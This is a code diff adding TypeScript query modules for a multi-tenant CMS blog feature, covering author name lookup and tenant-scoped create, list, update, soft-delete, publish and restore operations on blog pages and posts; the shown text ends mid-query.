+  if (!ad.linkUrl) {
+    return `<div class="ad">${image}</div>`;
+  }
+
+  return `<div class="ad"><a href="${escapeHtml(ad.linkUrl)}" rel="sponsored noopener noreferrer" target="_blank">${image}</a></div>`;
+}

--- a/src/modules/blog-content/application/author-lookup.ts
+++ b/src/modules/blog-content/application/author-lookup.ts
@@ -1,0 +1,53 @@
+/**
+ * Author display-name lookup for the admin UI (Issue #543 §Post List/§Post
+ * Editor — "author" column/field). A blog post/page only stores
+ * `author_tenant_user_id` (a bare id, `blog-post-directory.ts`/
+ * `blog-page-directory.ts` intentionally stay pure to their own table).
+ * Resolving that id to a human-readable name means joining
+ * `awcms_tenant_users` -> `awcms_identities` -> `awcms_profiles`
+ * (`display_name`) — the exact join `identity-access/application/
+ * user-directory.ts`'s `fetchTenantUsersWithRoles` already does for
+ * `/admin/access-users`, but that function also loads role assignments and
+ * is gated by `identity_access.user_management.read`, a permission a blog
+ * editor need not hold just to see who authored a post. This file is a
+ * narrower, purpose-built read: tenant-scoped, bounded to the ids actually
+ * requested, no role data, and usable by anyone who can already read blog
+ * posts/pages (author names of content they can already see is not new
+ * information exposure).
+ */
+
+export type AuthorLookupRow = {
+  tenant_user_id: string;
+  display_name: string;
+};
+
+/**
+ * Returns a `Map<tenantUserId, displayName>` covering every id in
+ * `tenantUserIds` that still resolves to an active tenant-user row (a
+ * deleted/orphaned author id is simply absent from the map — callers should
+ * fall back to a placeholder, never throw).
+ */
+export async function fetchAuthorDisplayNames(
+  tx: Bun.SQL,
+  tenantId: string,
+  tenantUserIds: readonly string[]
+): Promise<Map<string, string>> {
+  const uniqueIds = [...new Set(tenantUserIds)];
+
+  if (uniqueIds.length === 0) {
+    return new Map();
+  }
+
+  const rows = (await tx`
+    SELECT tu.id AS tenant_user_id, p.display_name
+    FROM awcms_tenant_users tu
+    JOIN awcms_identities i
+      ON i.id = tu.identity_id AND i.tenant_id = tu.tenant_id
+    JOIN awcms_profiles p
+      ON p.id = i.profile_id AND p.tenant_id = tu.tenant_id
+    WHERE tu.tenant_id = ${tenantId}
+      AND tu.id = ANY(${tx.array([...uniqueIds], "uuid")})
+  `) as AuthorLookupRow[];
+
+  return new Map(rows.map((row) => [row.tenant_user_id, row.display_name]));
+}

--- a/src/modules/blog-content/application/blog-page-directory.ts
+++ b/src/modules/blog-content/application/blog-page-directory.ts
@@ -1,0 +1,393 @@
+import type {
+  BlogContentStatus,
+  BlogContentVisibility
+} from "../domain/post-status";
+import type {
+  CreateBlogPageInput,
+  UpdateBlogPageInput
+} from "../domain/blog-page-validation";
+import type { PageType } from "../domain/page-type";
+import {
+  boundedPageNumber,
+  boundedPageSize
+} from "../../_shared/offset-pagination";
+
+/**
+ * Read/write query module for `awcms_blog_pages` (Issue #539) — same
+ * "directory holds both reads and writes for one resource" convention
+ * `blog-post-directory.ts` (Issue #538) established. Pages get plain CRUD
+ * only (no publish/schedule/archive/restore/purge lifecycle actions —
+ * doc issue #539's Routes section lists only GET/POST/GET/PATCH/DELETE for
+ * pages, unlike posts; those permissions are already seeded (#537) for a
+ * future issue to wire up, not this one).
+ */
+export type BlogPageSummary = {
+  id: string;
+  tenantId: string;
+  title: string;
+  slug: string;
+  status: string;
+  visibility: string;
+  pageType: string;
+  parentPageId: string | null;
+  menuOrder: number;
+  locale: string;
+  updatedAt: Date;
+};
+
+type BlogPageSummaryRow = {
+  id: string;
+  tenant_id: string;
+  title: string;
+  slug: string;
+  status: string;
+  visibility: string;
+  page_type: string;
+  parent_page_id: string | null;
+  menu_order: number;
+  locale: string;
+  updated_at: Date;
+};
+
+function toBlogPageSummary(row: BlogPageSummaryRow): BlogPageSummary {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    title: row.title,
+    slug: row.slug,
+    status: row.status,
+    visibility: row.visibility,
+    pageType: row.page_type,
+    parentPageId: row.parent_page_id,
+    menuOrder: row.menu_order,
+    locale: row.locale,
+    updatedAt: row.updated_at
+  };
+}
+
+export type BlogPageView = {
+  id: string;
+  tenantId: string;
+  authorTenantUserId: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  contentJson: Record<string, unknown>;
+  contentText: string;
+  status: BlogContentStatus;
+  visibility: BlogContentVisibility;
+  featuredMediaId: string | null;
+  seoTitle: string | null;
+  metaDescription: string | null;
+  canonicalUrl: string | null;
+  locale: string;
+  pageType: PageType;
+  parentPageId: string | null;
+  menuOrder: number;
+  publishedAt: Date | null;
+  scheduledAt: Date | null;
+  createdAt: Date;
+  updatedAt: Date;
+  deletedAt: Date | null;
+  deletedBy: string | null;
+  deleteReason: string | null;
+  restoredAt: Date | null;
+  restoredBy: string | null;
+  version: number;
+};
+
+type BlogPageRow = {
+  id: string;
+  tenant_id: string;
+  author_tenant_user_id: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  content_json: Record<string, unknown>;
+  content_text: string;
+  status: BlogContentStatus;
+  visibility: BlogContentVisibility;
+  featured_media_id: string | null;
+  seo_title: string | null;
+  meta_description: string | null;
+  canonical_url: string | null;
+  locale: string;
+  page_type: PageType;
+  parent_page_id: string | null;
+  menu_order: number;
+  published_at: Date | null;
+  scheduled_at: Date | null;
+  created_at: Date;
+  updated_at: Date;
+  deleted_at: Date | null;
+  deleted_by: string | null;
+  delete_reason: string | null;
+  restored_at: Date | null;
+  restored_by: string | null;
+  version: number;
+};
+
+function toView(row: BlogPageRow): BlogPageView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    authorTenantUserId: row.author_tenant_user_id,
+    title: row.title,
+    slug: row.slug,
+    excerpt: row.excerpt,
+    contentJson: row.content_json,
+    contentText: row.content_text,
+    status: row.status,
+    visibility: row.visibility,
+    featuredMediaId: row.featured_media_id,
+    seoTitle: row.seo_title,
+    metaDescription: row.meta_description,
+    canonicalUrl: row.canonical_url,
+    locale: row.locale,
+    pageType: row.page_type,
+    parentPageId: row.parent_page_id,
+    menuOrder: row.menu_order,
+    publishedAt: row.published_at,
+    scheduledAt: row.scheduled_at,
+    createdAt: row.created_at,
+    updatedAt: row.updated_at,
+    deletedAt: row.deleted_at,
+    deletedBy: row.deleted_by,
+    deleteReason: row.delete_reason,
+    restoredAt: row.restored_at,
+    restoredBy: row.restored_by,
+    version: row.version
+  };
+}
+
+export async function createBlogPage(
+  tx: Bun.SQL,
+  tenantId: string,
+  authorTenantUserId: string,
+  input: CreateBlogPageInput
+): Promise<BlogPageView> {
+  const rows = (await tx`
+    INSERT INTO awcms_blog_pages
+      (tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+       content_text, status, visibility, featured_media_id, seo_title,
+       meta_description, canonical_url, locale, page_type, parent_page_id,
+       menu_order)
+    VALUES (
+      ${tenantId}, ${authorTenantUserId}, ${input.title}, ${input.slug},
+      ${input.excerpt}, ${input.contentJson}, ${input.contentText}, 'draft',
+      ${input.visibility}, ${input.featuredMediaId}, ${input.seoTitle},
+      ${input.metaDescription}, ${input.canonicalUrl}, ${input.locale},
+      ${input.pageType}, ${input.parentPageId}, ${input.menuOrder}
+    )
+    RETURNING id, tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+      content_text, status, visibility, featured_media_id, seo_title,
+      meta_description, canonical_url, locale, page_type, parent_page_id,
+      menu_order, published_at, scheduled_at, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by, version
+  `) as BlogPageRow[];
+
+  return toView(rows[0]!);
+}
+
+export type FetchBlogPageOptions = {
+  includeDeleted?: boolean;
+};
+
+export async function fetchBlogPageById(
+  tx: Bun.SQL,
+  tenantId: string,
+  pageId: string,
+  options: FetchBlogPageOptions = {}
+): Promise<BlogPageView | null> {
+  const rows = (
+    options.includeDeleted
+      ? await tx`
+        SELECT id, tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+      content_text, status, visibility, featured_media_id, seo_title,
+      meta_description, canonical_url, locale, page_type, parent_page_id,
+      menu_order, published_at, scheduled_at, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by, version
+        FROM awcms_blog_pages
+        WHERE tenant_id = ${tenantId} AND id = ${pageId}
+      `
+      : await tx`
+        SELECT id, tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+      content_text, status, visibility, featured_media_id, seo_title,
+      meta_description, canonical_url, locale, page_type, parent_page_id,
+      menu_order, published_at, scheduled_at, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by, version
+        FROM awcms_blog_pages
+        WHERE tenant_id = ${tenantId} AND id = ${pageId} AND deleted_at IS NULL
+      `
+  ) as BlogPageRow[];
+
+  const row = rows[0];
+  return row ? toView(row) : null;
+}
+
+export type ListBlogPagesFilter = {
+  status?: BlogContentStatus;
+  pageType?: PageType;
+  limit?: number;
+};
+
+const DEFAULT_LIST_LIMIT = 20;
+const MAX_LIST_LIMIT = 100;
+
+/** `LIMIT` bounded (default 20, max 100), newest-updated first — same convention as `listBlogPosts`. */
+export async function listBlogPages(
+  tx: Bun.SQL,
+  tenantId: string,
+  filter: ListBlogPagesFilter = {}
+): Promise<BlogPageSummary[]> {
+  const limit = Math.min(
+    Math.max(filter.limit ?? DEFAULT_LIST_LIMIT, 1),
+    MAX_LIST_LIMIT
+  );
+
+  const rows = (await tx`
+    SELECT id, tenant_id, title, slug, status, visibility, page_type, parent_page_id, menu_order, locale, updated_at
+    FROM awcms_blog_pages
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+      AND (${filter.status ?? null}::text IS NULL OR status = ${filter.status ?? null})
+      AND (${filter.pageType ?? null}::text IS NULL OR page_type = ${filter.pageType ?? null})
+    ORDER BY menu_order ASC, updated_at DESC
+    LIMIT ${limit}
+  `) as BlogPageSummaryRow[];
+
+  return rows.map(toBlogPageSummary);
+}
+
+export type ListBlogPagesForAdminFilter = {
+  search?: string;
+  status?: BlogContentStatus;
+  pageType?: PageType;
+  page?: number;
+  pageSize?: number;
+};
+
+export type ListBlogPagesForAdminResult = {
+  items: BlogPageSummary[];
+  total: number;
+  page: number;
+  pageSize: number;
+};
+
+const DEFAULT_ADMIN_LIST_PAGE_SIZE = 20;
+const MAX_ADMIN_LIST_PAGE_SIZE = 100;
+
+/**
+ * Admin page list (Issue #543 §Page List) — additive, mirrors
+ * `blog-post-directory.ts`'s `listBlogPostsForAdmin` (`ILIKE` title search,
+ * page-number pagination with a total count) minus the term filter (pages
+ * have no taxonomy relation).
+ */
+export async function listBlogPagesForAdmin(
+  tx: Bun.SQL,
+  tenantId: string,
+  filter: ListBlogPagesForAdminFilter = {}
+): Promise<ListBlogPagesForAdminResult> {
+  const pageSize = boundedPageSize(
+    filter.pageSize,
+    DEFAULT_ADMIN_LIST_PAGE_SIZE,
+    MAX_ADMIN_LIST_PAGE_SIZE
+  );
+  const page = boundedPageNumber(filter.page);
+  const offset = (page - 1) * pageSize;
+  const search = filter.search?.trim() || null;
+  const status = filter.status ?? null;
+  const pageType = filter.pageType ?? null;
+
+  const rows = (await tx`
+    SELECT id, tenant_id, title, slug, status, visibility, page_type, parent_page_id, menu_order, locale, updated_at
+    FROM awcms_blog_pages
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+      AND (${status}::text IS NULL OR status = ${status})
+      AND (${pageType}::text IS NULL OR page_type = ${pageType})
+      AND (${search}::text IS NULL OR title ILIKE '%' || ${search} || '%')
+    ORDER BY updated_at DESC
+    LIMIT ${pageSize} OFFSET ${offset}
+  `) as BlogPageSummaryRow[];
+
+  const countRows = (await tx`
+    SELECT count(*)::int AS count
+    FROM awcms_blog_pages
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+      AND (${status}::text IS NULL OR status = ${status})
+      AND (${pageType}::text IS NULL OR page_type = ${pageType})
+      AND (${search}::text IS NULL OR title ILIKE '%' || ${search} || '%')
+  `) as { count: number }[];
+
+  return {
+    items: rows.map(toBlogPageSummary),
+    total: countRows[0]?.count ?? 0,
+    page,
+    pageSize
+  };
+}
+
+/** Partial update; `version` bumped on every successful write (same monotonic-counter convention as `updateBlogPost`, no optimistic-concurrency check yet). */
+export async function updateBlogPage(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  input: UpdateBlogPageInput
+): Promise<BlogPageView | null> {
+  const rows = (await tx`
+    UPDATE awcms_blog_pages
+    SET title = COALESCE(${input.title ?? null}, title),
+        slug = COALESCE(${input.slug ?? null}, slug),
+        excerpt = CASE WHEN ${input.excerpt === undefined} THEN excerpt ELSE ${input.excerpt ?? null} END,
+        content_json = COALESCE(${input.contentJson ?? null}, content_json),
+        content_text = COALESCE(${input.contentText ?? null}, content_text),
+        locale = COALESCE(${input.locale ?? null}, locale),
+        visibility = COALESCE(${input.visibility ?? null}, visibility),
+        featured_media_id = CASE
+          WHEN ${input.featuredMediaId === undefined} THEN featured_media_id
+          ELSE ${input.featuredMediaId ?? null}
+        END,
+        seo_title = CASE WHEN ${input.seoTitle === undefined} THEN seo_title ELSE ${input.seoTitle ?? null} END,
+        meta_description = CASE
+          WHEN ${input.metaDescription === undefined} THEN meta_description
+          ELSE ${input.metaDescription ?? null}
+        END,
+        canonical_url = CASE
+          WHEN ${input.canonicalUrl === undefined} THEN canonical_url
+          ELSE ${input.canonicalUrl ?? null}
+        END,
+        page_type = COALESCE(${input.pageType ?? null}, page_type),
+        parent_page_id = CASE
+          WHEN ${input.parentPageId === undefined} THEN parent_page_id
+          ELSE ${input.parentPageId ?? null}
+        END,
+        menu_order = COALESCE(${input.menuOrder ?? null}, menu_order),
+        version = version + 1,
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id, tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+      content_text, status, visibility, featured_media_id, seo_title,
+      meta_description, canonical_url, locale, page_type, parent_page_id,
+      menu_order, published_at, scheduled_at, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by, version
+  `) as BlogPageRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+export async function softDeleteBlogPage(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  reason: string
+): Promise<boolean> {
+  const rows = await tx`
+    UPDATE awcms_blog_pages
+    SET deleted_at = now(), deleted_by = ${actorTenantUserId}, delete_reason = ${reason},
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id
+  `;
+
+  return rows.length > 0;
+}

--- a/src/modules/blog-content/application/blog-post-directory.ts
+++ b/src/modules/blog-content/application/blog-post-directory.ts
@@ -1,0 +1,518 @@
+import type {
+  BlogContentStatus,
+  BlogContentVisibility
+} from "../domain/post-status";
+import type {
+  CreateBlogPostInput,
+  UpdateBlogPostInput
+} from "../domain/blog-post-validation";
+import {
+  boundedPageNumber,
+  boundedPageSize
+} from "../../_shared/offset-pagination";
+
+/**
+ * Read/write query module for `awcms_blog_posts` (Issue #537 scaffolded
+ * this file as a read-only placeholder; Issue #538 fills in the mutations
+ * its admin API needs) — same "directory holds both reads and writes for one
+ * resource" convention as `email/application/email-template-directory.ts`.
+ */
+export type BlogPostSummary = {
+  id: string;
+  tenantId: string;
+  title: string;
+  slug: string;
+  status: string;
+  visibility: string;
+  locale: string;
+  publishedAt: Date | null;
+  updatedAt: Date;
+};
+
+type BlogPostSummaryRow = {
+  id: string;
+  tenant_id: string;
+  title: string;
+  slug: string;
+  status: string;
+  visibility: string;
+  locale: string;
+  published_at: Date | null;
+  updated_at: Date;
+};
+
+function toBlogPostSummary(row: BlogPostSummaryRow): BlogPostSummary {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    title: row.title,
+    slug: row.slug,
+    status: row.status,
+    visibility: row.visibility,
+    locale: row.locale,
+    publishedAt: row.published_at,
+    updatedAt: row.updated_at
+  };
+}
+
+export type BlogPostView = {
+  id: string;
+  tenantId: string;
+  authorTenantUserId: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  contentJson: Record<string, unknown>;
+  contentText: string;
+  status: BlogContentStatus;
+  visibility: BlogContentVisibility;
+  featuredMediaId: string | null;
+  /** Issue #649 — explicit social/SEO preview image override; see `blog-post-validation.ts`'s `CreateBlogPostInput.seoImageMediaId`. */
+  seoImageMediaId: string | null;
+  seoTitle: string | null;
+  metaDescription: string | null;
+  canonicalUrl: string | null;
+  locale: string;
+  publishedAt: Date | null;
+  scheduledAt: Date | null;
+  createdAt: Date;
+  updatedAt: Date;
+  deletedAt: Date | null;
+  deletedBy: string | null;
+  deleteReason: string | null;
+  restoredAt: Date | null;
+  restoredBy: string | null;
+  version: number;
+  /** Issue #641 — manual per-post opt-out of automatic internal tag linking. */
+  autoInternalTagLinksDisabled: boolean;
+};
+
+type BlogPostRow = {
+  id: string;
+  tenant_id: string;
+  author_tenant_user_id: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  content_json: Record<string, unknown>;
+  content_text: string;
+  status: BlogContentStatus;
+  visibility: BlogContentVisibility;
+  featured_media_id: string | null;
+  seo_image_media_id: string | null;
+  seo_title: string | null;
+  meta_description: string | null;
+  canonical_url: string | null;
+  locale: string;
+  published_at: Date | null;
+  scheduled_at: Date | null;
+  created_at: Date;
+  updated_at: Date;
+  deleted_at: Date | null;
+  deleted_by: string | null;
+  delete_reason: string | null;
+  restored_at: Date | null;
+  restored_by: string | null;
+  version: number;
+  auto_internal_tag_links_disabled: boolean;
+};
+
+function toView(row: BlogPostRow): BlogPostView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    authorTenantUserId: row.author_tenant_user_id,
+    title: row.title,
+    slug: row.slug,
+    excerpt: row.excerpt,
+    contentJson: row.content_json,
+    contentText: row.content_text,
+    status: row.status,
+    visibility: row.visibility,
+    featuredMediaId: row.featured_media_id,
+    seoImageMediaId: row.seo_image_media_id,
+    seoTitle: row.seo_title,
+    metaDescription: row.meta_description,
+    canonicalUrl: row.canonical_url,
+    locale: row.locale,
+    publishedAt: row.published_at,
+    scheduledAt: row.scheduled_at,
+    createdAt: row.created_at,
+    updatedAt: row.updated_at,
+    deletedAt: row.deleted_at,
+    deletedBy: row.deleted_by,
+    deleteReason: row.delete_reason,
+    restoredAt: row.restored_at,
+    restoredBy: row.restored_by,
+    version: row.version,
+    autoInternalTagLinksDisabled: row.auto_internal_tag_links_disabled
+  };
+}
+
+export async function createBlogPost(
+  tx: Bun.SQL,
+  tenantId: string,
+  authorTenantUserId: string,
+  input: CreateBlogPostInput
+): Promise<BlogPostView> {
+  const rows = (await tx`
+    INSERT INTO awcms_blog_posts
+      (tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+       content_text, status, visibility, featured_media_id, seo_image_media_id,
+       seo_title, meta_description, canonical_url, locale,
+       auto_internal_tag_links_disabled)
+    VALUES (
+      ${tenantId}, ${authorTenantUserId}, ${input.title}, ${input.slug},
+      ${input.excerpt}, ${input.contentJson}, ${input.contentText}, 'draft',
+      ${input.visibility}, ${input.featuredMediaId}, ${input.seoImageMediaId},
+      ${input.seoTitle}, ${input.metaDescription}, ${input.canonicalUrl}, ${input.locale},
+      ${input.autoInternalTagLinksDisabled}
+    )
+    RETURNING id, tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+      content_text, status, visibility, featured_media_id, seo_image_media_id, seo_title,
+      meta_description, canonical_url, locale, published_at, scheduled_at,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason,
+      restored_at, restored_by, version, auto_internal_tag_links_disabled
+  `) as BlogPostRow[];
+
+  return toView(rows[0]!);
+}
+
+export type FetchBlogPostOptions = {
+  includeDeleted?: boolean;
+};
+
+/** Excludes soft-deleted posts unless `includeDeleted` (restore/purge need to look up an already-deleted row). */
+export async function fetchBlogPostById(
+  tx: Bun.SQL,
+  tenantId: string,
+  postId: string,
+  options: FetchBlogPostOptions = {}
+): Promise<BlogPostView | null> {
+  const rows = (
+    options.includeDeleted
+      ? await tx`
+        SELECT id, tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+      content_text, status, visibility, featured_media_id, seo_image_media_id, seo_title,
+      meta_description, canonical_url, locale, published_at, scheduled_at,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason,
+      restored_at, restored_by, version, auto_internal_tag_links_disabled
+        FROM awcms_blog_posts
+        WHERE tenant_id = ${tenantId} AND id = ${postId}
+      `
+      : await tx`
+        SELECT id, tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+      content_text, status, visibility, featured_media_id, seo_image_media_id, seo_title,
+      meta_description, canonical_url, locale, published_at, scheduled_at,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason,
+      restored_at, restored_by, version, auto_internal_tag_links_disabled
+        FROM awcms_blog_posts
+        WHERE tenant_id = ${tenantId} AND id = ${postId} AND deleted_at IS NULL
+      `
+  ) as BlogPostRow[];
+
+  const row = rows[0];
+  return row ? toView(row) : null;
+}
+
+export type ListBlogPostsFilter = {
+  status?: BlogContentStatus;
+  limit?: number;
+};
+
+const DEFAULT_LIST_LIMIT = 20;
+const MAX_LIST_LIMIT = 100;
+
+/** `LIMIT` bounded (default 20, max 100), newest-updated first — same bounded-list convention as `email/templates` and `workflows/tasks` (no cursor pagination yet). */
+export async function listBlogPosts(
+  tx: Bun.SQL,
+  tenantId: string,
+  filter: ListBlogPostsFilter = {}
+): Promise<BlogPostSummary[]> {
+  const limit = boundedPageSize(
+    filter.limit,
+    DEFAULT_LIST_LIMIT,
+    MAX_LIST_LIMIT
+  );
+
+  const rows = (
+    filter.status
+      ? await tx`
+        SELECT id, tenant_id, title, slug, status, visibility, locale, published_at, updated_at
+        FROM awcms_blog_posts
+        WHERE tenant_id = ${tenantId} AND status = ${filter.status} AND deleted_at IS NULL
+        ORDER BY updated_at DESC
+        LIMIT ${limit}
+      `
+      : await tx`
+        SELECT id, tenant_id, title, slug, status, visibility, locale, published_at, updated_at
+        FROM awcms_blog_posts
+        WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+        ORDER BY updated_at DESC
+        LIMIT ${limit}
+      `
+  ) as BlogPostSummaryRow[];
+
+  return rows.map(toBlogPostSummary);
+}
+
+/** Kept for the pre-#538 call shape (filter by status with an explicit limit) — a thin wrapper over `listBlogPosts`. */
+export async function listBlogPostsByStatus(
+  tx: Bun.SQL,
+  tenantId: string,
+  status: BlogContentStatus,
+  limit: number = DEFAULT_LIST_LIMIT
+): Promise<BlogPostSummary[]> {
+  return listBlogPosts(tx, tenantId, { status, limit });
+}
+
+/** Partial update; `version` is bumped on every successful write (monotonic change counter — no optimistic-concurrency check is enforced yet, see module README). */
+export async function updateBlogPost(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  input: UpdateBlogPostInput
+): Promise<BlogPostView | null> {
+  const rows = (await tx`
+    UPDATE awcms_blog_posts
+    SET title = COALESCE(${input.title ?? null}, title),
+        slug = COALESCE(${input.slug ?? null}, slug),
+        excerpt = CASE WHEN ${input.excerpt === undefined} THEN excerpt ELSE ${input.excerpt ?? null} END,
+        content_json = COALESCE(${input.contentJson ?? null}, content_json),
+        content_text = COALESCE(${input.contentText ?? null}, content_text),
+        locale = COALESCE(${input.locale ?? null}, locale),
+        visibility = COALESCE(${input.visibility ?? null}, visibility),
+        featured_media_id = CASE
+          WHEN ${input.featuredMediaId === undefined} THEN featured_media_id
+          ELSE ${input.featuredMediaId ?? null}
+        END,
+        seo_image_media_id = CASE
+          WHEN ${input.seoImageMediaId === undefined} THEN seo_image_media_id
+          ELSE ${input.seoImageMediaId ?? null}
+        END,
+        seo_title = CASE WHEN ${input.seoTitle === undefined} THEN seo_title ELSE ${input.seoTitle ?? null} END,
+        meta_description = CASE
+          WHEN ${input.metaDescription === undefined} THEN meta_description
+          ELSE ${input.metaDescription ?? null}
+        END,
+        canonical_url = CASE
+          WHEN ${input.canonicalUrl === undefined} THEN canonical_url
+          ELSE ${input.canonicalUrl ?? null}
+        END,
+        auto_internal_tag_links_disabled = COALESCE(
+          ${input.autoInternalTagLinksDisabled ?? null},
+          auto_internal_tag_links_disabled
+        ),
+        version = version + 1,
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id, tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+      content_text, status, visibility, featured_media_id, seo_image_media_id, seo_title,
+      meta_description, canonical_url, locale, published_at, scheduled_at,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason,
+      restored_at, restored_by, version, auto_internal_tag_links_disabled
+  `) as BlogPostRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+export async function softDeleteBlogPost(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  reason: string
+): Promise<boolean> {
+  const rows = await tx`
+    UPDATE awcms_blog_posts
+    SET deleted_at = now(), deleted_by = ${actorTenantUserId}, delete_reason = ${reason},
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id
+  `;
+
+  return rows.length > 0;
+}
+
+export type TransitionBlogPostStatusOptions = {
+  scheduledAt?: Date;
+};
+
+/**
+ * Shared mutation for submit-review/publish/schedule/archive (Issue #538) —
+ * status-transition validity itself (`isValidStatusTransition`) is checked
+ * by the caller before this runs, so this is a plain conditional write, not
+ * a second source of truth for which transitions are legal.
+ */
+export async function transitionBlogPostStatus(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  toStatus: BlogContentStatus,
+  options: TransitionBlogPostStatusOptions = {}
+): Promise<BlogPostView | null> {
+  const rows = (await tx`
+    UPDATE awcms_blog_posts
+    SET status = ${toStatus},
+        published_at = CASE WHEN ${toStatus === "published"} THEN now() ELSE published_at END,
+        scheduled_at = CASE
+          WHEN ${toStatus === "scheduled"} THEN ${options.scheduledAt ?? null}
+          WHEN ${toStatus !== "scheduled"} THEN NULL
+          ELSE scheduled_at
+        END,
+        version = version + 1,
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id, tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+      content_text, status, visibility, featured_media_id, seo_image_media_id, seo_title,
+      meta_description, canonical_url, locale, published_at, scheduled_at,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason,
+      restored_at, restored_by, version, auto_internal_tag_links_disabled
+  `) as BlogPostRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+export async function restoreBlogPost(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string
+): Promise<BlogPostView | null> {
+  const rows = (await tx`
+    UPDATE awcms_blog_posts
+    SET deleted_at = NULL, deleted_by = NULL, delete_reason = NULL,
+        restored_at = now(), restored_by = ${actorTenantUserId}, updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NOT NULL
+    RETURNING id, tenant_id, author_tenant_user_id, title, slug, excerpt, content_json,
+      content_text, status, visibility, featured_media_id, seo_image_media_id, seo_title,
+      meta_description, canonical_url, locale, published_at, scheduled_at,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason,
+      restored_at, restored_by, version, auto_internal_tag_links_disabled
+  `) as BlogPostRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+export type ListBlogPostsForAdminFilter = {
+  search?: string;
+  status?: BlogContentStatus;
+  /** Matches posts assigned this category/tag term id (via `awcms_blog_post_terms`). */
+  termId?: string;
+  page?: number;
+  pageSize?: number;
+};
+
+export type ListBlogPostsForAdminResult = {
+  items: (BlogPostSummary & { authorTenantUserId: string })[];
+  total: number;
+  page: number;
+  pageSize: number;
+};
+
+type BlogPostAdminListRow = BlogPostSummaryRow & {
+  author_tenant_user_id: string;
+};
+
+const DEFAULT_ADMIN_LIST_PAGE_SIZE = 20;
+const MAX_ADMIN_LIST_PAGE_SIZE = 100;
+
+/**
+ * Admin post list (Issue #543 §Post List — search, status filter,
+ * category/tag filter, pagination) — additive to this file, does not touch
+ * `listBlogPosts` (still used by `GET /api/v1/blog/posts` as-is). `search`
+ * is a plain `ILIKE` on `title` (not `search_vector`/`websearch_to_tsquery`
+ * — those reject an empty query, which the default "no filter" list view
+ * needs to tolerate). `termId` matches via `EXISTS` against
+ * `awcms_blog_post_terms` rather than a `JOIN`, so a post with several
+ * terms is never returned more than once. Page-number/`LIMIT`/`OFFSET`
+ * pagination (not keyset) — this is a human-browsed admin table with
+ * "page 1, 2, 3" controls, same UX category `public-blog-directory.ts`'s
+ * index/archive pagination already chose over keyset for the same reason.
+ */
+export async function listBlogPostsForAdmin(
+  tx: Bun.SQL,
+  tenantId: string,
+  filter: ListBlogPostsForAdminFilter = {}
+): Promise<ListBlogPostsForAdminResult> {
+  const pageSize = boundedPageSize(
+    filter.pageSize,
+    DEFAULT_ADMIN_LIST_PAGE_SIZE,
+    MAX_ADMIN_LIST_PAGE_SIZE
+  );
+  const page = boundedPageNumber(filter.page);
+  const offset = (page - 1) * pageSize;
+  const search = filter.search?.trim() || null;
+  const status = filter.status ?? null;
+  const termId = filter.termId ?? null;
+
+  const rows = (await tx`
+    SELECT p.id, p.tenant_id, p.title, p.slug, p.status, p.visibility, p.locale,
+           p.author_tenant_user_id, p.published_at, p.updated_at
+    FROM awcms_blog_posts p
+    WHERE p.tenant_id = ${tenantId} AND p.deleted_at IS NULL
+      AND (${status}::text IS NULL OR p.status = ${status})
+      AND (${search}::text IS NULL OR p.title ILIKE '%' || ${search} || '%')
+      AND (
+        ${termId}::uuid IS NULL
+        OR EXISTS (
+          SELECT 1 FROM awcms_blog_post_terms pt
+          WHERE pt.tenant_id = p.tenant_id AND pt.post_id = p.id AND pt.term_id = ${termId}
+        )
+      )
